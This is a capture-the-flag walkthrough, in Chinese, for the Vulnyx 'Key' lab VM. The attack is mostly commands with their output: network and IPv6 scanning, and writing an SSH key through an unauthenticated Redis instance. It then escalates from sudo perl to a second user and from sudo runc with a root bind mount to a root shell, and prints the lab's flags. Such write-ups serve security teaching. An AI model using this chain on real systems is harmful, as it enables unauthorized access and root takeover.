Vulnyx-Key-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.225  08:00:27:8a:aa:be       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.027 seconds (126.30 hosts/sec). 4 responded
❯ export ip=192.168.60.225
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.225:22
Open 192.168.60.225:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 10:52 CST
Initiating ARP Ping Scan at 10:52
Scanning 192.168.60.225 [1 port]
Completed ARP Ping Scan at 10:52, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:52
Completed Parallel DNS resolution of 1 host. at 10:52, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:52
Scanning 192.168.60.225 [2 ports]
Discovered open port 22/tcp on 192.168.60.225
Discovered open port 80/tcp on 192.168.60.225
Completed SYN Stealth Scan at 10:52, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.60.225
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-03-04 10:52:38 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:8A:AA:BE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

枚举目录

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.225
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10705]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

没有什么信息

IPv6入口

不过你可以走偏一点，扫一下IPv6

额外收获，开放6379端口redis服务

❯ nmap -6 fe80::a00:27ff:fe8a:aabe%eth0 -A -sV -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 11:05 CST
Nmap scan report for fe80::a00:27ff:fe8a:aabe
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.54 ((Debian))
6379/tcp open  redis   Redis key-value store 6.0.16
MAC Address: 08:00:27:8A:AA:BE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.19
OS details: Linux 4.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| address-info:
|   IPv6 EUI-64:
|     MAC address:
|       address: 08:00:27:8a:aa:be
|_      manuf: PCS Systemtechnik/Oracle VirtualBox virtual NIC

TRACEROUTE
HOP RTT     ADDRESS
1   1.51 ms fe80::a00:27ff:fe8a:aabe

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.30 seconds

通过redis命令行工具连接一下

从config配置中得知用户dick

❯ redis-cli -h fe80::a00:27ff:fe8a:aabe%eth0 -p 6379
[fe80::a00:27ff:fe8a:aabe%eth0]:6379> CONFIG GET *
285) "dir"
286) "/home/dick"
287) "save"
[fe80::a00:27ff:fe8a:aabe%eth0]:6379>

redis写公钥

可以尝试写ssh公钥

[fe80::a00:27ff:fe8a:aabe%eth0]:6379> CONFIG SET dir /home/dick/.ssh
OK
------------------------------------------------------
#新开一个终端
❯ (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
❯ cat spaced_key.txt|redis-cli -h fe80::a00:27ff:fe8a:aabe%eth0 -p 6379 -x set ssh_key
OK
-------------------------------------------------------
[fe80::a00:27ff:fe8a:aabe%eth0]:6379> CONFIG SET dbfilename "authorized_keys"
OK
[fe80::a00:27ff:fe8a:aabe%eth0]:6379> save
OK
[fe80::a00:27ff:fe8a:aabe%eth0]:6379> exit

用户提权

ssh利用私钥连接一下

用户拥有sudo权限，提权至gary

❯ ssh dick@$ip -i ../.ssh/id_rsa
Linux key 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64
Last login: Sun May 21 19:09:56 2023 from 192.168.1.10
dick@key:~$ ls -al
total 40
drwx------ 4 dick dick 4096 may 21  2023 .
drwxr-xr-x 4 root root 4096 may 21  2023 ..
lrwxrwxrwx 1 root root    9 jul 19  2022 .bash_history -> /dev/null
-rwx------ 1 dick dick  220 jul 19  2022 .bash_logout
-rwx------ 1 dick dick 3526 jul 19  2022 .bashrc
drwx------ 3 dick dick 4096 jul 19  2022 .local
-rwx------ 1 dick dick  807 jul 19  2022 .profile
-rwx------ 1 dick dick  100 may 21  2023 .rediserve.sh
-rw-r--r-- 1 dick dick   66 jul 19  2022 .selected_editor
drwx------ 2 dick dick 4096 mar  4 06:01 .ssh
-r-------- 1 dick dick   33 may 21  2023 user.txt
dick@key:~$ cat user.txt
c58f5b2a916dc3287ec6901777ba7912
dick@key:~$ sudo -l
Matching Defaults entries for dick on key:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dick may run the following commands on key:
    (gary) NOPASSWD: /usr/bin/perl
dick@key:~$ sudo -u gary /usr/bin/perl -e 'exec "/bin/bash";'
gary@key:/home/dick$

Root提权

同时gary也有sudo权限可以执行runc

gary@key:/home/dick$ sudo -l
Matching Defaults entries for gary on key:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gary may run the following commands on key:
    (root) NOPASSWD: /usr/bin/runc

runc 是一个容器运行时工具，用于运行按照开放容器倡议（OCI）规范打包的容器。

RunC 权限提升 - HackTricks

利用创建容器将本地根目录映射到容器的根目录下

gary@key:/tmp$ mkdir container
gary@key:/tmp$ cd container/
gary@key:/tmp/container$ runc spec
gary@key:/tmp/container$ ls -al
total 12
drwxr-xr-x  2 gary gary 4096 mar  4 06:17 .
drwxrwxrwt 11 root root 4096 mar  4 06:17 ..
-rw-r--r--  1 gary gary 2592 mar  4 06:17 config.json
gary@key:/tmp/container$ vi config.json
##在mounts字段中添加
{
    "type": "bind",
    "source": "/",
    "destination": "/",
    "options": [
        "rbind",
        "rw",
        "rprivate"
    ]
},
gary@key:/tmp/container$ mkdir rootfs
gary@key:/tmp/container$ sudo /usr/bin/runc run container
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
c4fe6806da41e3087eff3c01b1a98d5f